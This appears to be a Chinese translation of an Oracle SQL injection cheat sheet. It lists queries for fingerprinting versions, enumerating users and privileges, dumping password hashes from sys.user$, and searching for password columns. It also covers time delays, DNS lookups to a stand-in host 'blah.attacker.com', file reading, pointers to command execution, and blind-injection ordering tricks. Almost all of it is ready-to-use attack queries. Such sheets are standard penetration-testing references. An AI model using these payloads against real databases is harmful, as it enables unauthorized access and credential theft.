注:下面的一部分查詢只能由admin執行,我會在查詢的末尾以"-priv“標注。
探測版本:
SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’; SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’; SELECT version FROM v$instance; 注釋:
SELECT 1 FROM dual — comment 注: Oracle的SELECT語句必須包含FROM從句,所以當我們並不是真的准備查詢一個表的時候,我們必須使用一個假的表名‘dual’
當前用戶:
SELECT user FROM dual 列出所有用戶:
SELECT username FROM all_users ORDER BY username; SELECT name FROM sys.user$; — priv 列出密碼哈希:
SELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus能夠在acct被鎖定的狀態下給你反饋 SELECT name,spare4 FROM sys.user$ — priv, 11g 密碼破解:
checkpwd能夠把Oracle8,9,10的基於DES的哈希破解掉
列出權限:
SELECT * FROM session_privs; —當前用戶的權限 SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, 列出指定用戶的權限 SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, 找到擁有某個權限的用戶 SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS; 列出DBA賬戶:
SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, 列出DBA和對應權限 當前數據庫:
SELECT global_name FROM global_name; SELECT name FROM v$database; SELECT instance_name FROM v$instance; SELECT SYS.DATABASE_NAME FROM DUAL; 列出數據庫:
SELECT DISTINCT owner FROM all_tables; — 列出數據庫 (一個用戶一個) – 通過查詢TNS監聽程序能夠查詢到其他數據庫.詳情看tnscmd。
列出字段名:
SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’; SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’; 列出表名:
SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables; 通過字段名找到對應表:
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — 注: 表名都是大寫
查詢第N行:
SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — 查詢第9行(從1開始數) 查詢第N個字符:
SELECT substr(‘abcd’, 3, 1) FROM dual; — 得到第三個字符‘c’ 按位與(Bitwise AND):
SELECT bitand(6,2) FROM dual; — 返回2 SELECT bitand(6,1) FROM dual; — 返回0 ASCII值轉字符:
SELECT chr(65) FROM dual; — 返回A 字符轉ASCII碼:
SELECT ascii(‘A’) FROM dual; — 返回65 類型轉換:
SELECT CAST(1 AS char) FROM dual; SELECT CAST(’1′ AS int) FROM dual; 拼接字符:
SELECT ‘A’ || ‘B’ FROM dual; — 返回AB IF語句:
BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — 跟SELECT語句在一起時不太管用
Case語句:
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — 返回1 SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — 返回2 繞過引號:
SELECT chr(65) || chr(66) FROM dual; — 返回AB 延時:
BEGIN DBMS_LOCK.SLEEP(5); END; — priv, 在SELECT中用不了 SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — 如果反查很慢 SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — 如果正查很慢 SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — 如果發送TCP包被攔截或者很慢 — 更多關於延時的內容請看Heavy Queries
發送DNS請求:
SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual; SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; 命令執行:
如果目標機裝了JAVA就能執行命令,看這里
有時候ExtProc也可以,不過我一般都成功不了,看這里
本地文件讀取:
UTL_FILE有時候能用。如果下面的語句沒有返回null就行。
SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’; JAVA能用來讀取和寫入文件,除了Oracle Express
主機名稱、IP地址:
SELECT UTL_INADDR.get_host_name FROM dual; SELECT host_name FROM v$instance; SELECT UTL_INADDR.get_host_address FROM dual; — 查IP SELECT UTL_INADDR.get_host_name(’10.0.0.1′) FROM dual; — 查主機名稱 定位DB文件:
SELECT name FROM V$DATAFILE; 默認系統和數據庫:
SYSTEM SYSAUX 額外小貼士:
一個字符串列出所有表名:
select rtrim(xmlagg(xmlelement(e, table_name || ‘,’)).extract(‘//text()’).extract(‘//text()’) ,’,') from all_tables – 當你union聯查注入的時候只有一行能用與返回數據時使用
盲注排序:
order by case when ((select 1 from user_tables where substr(lower(table_name), 1, 1) = ‘a’ and rownum = 1)=1) then column_name1 else column_name2 end — 你必須知道兩個擁有相同數據類型的字段名才能用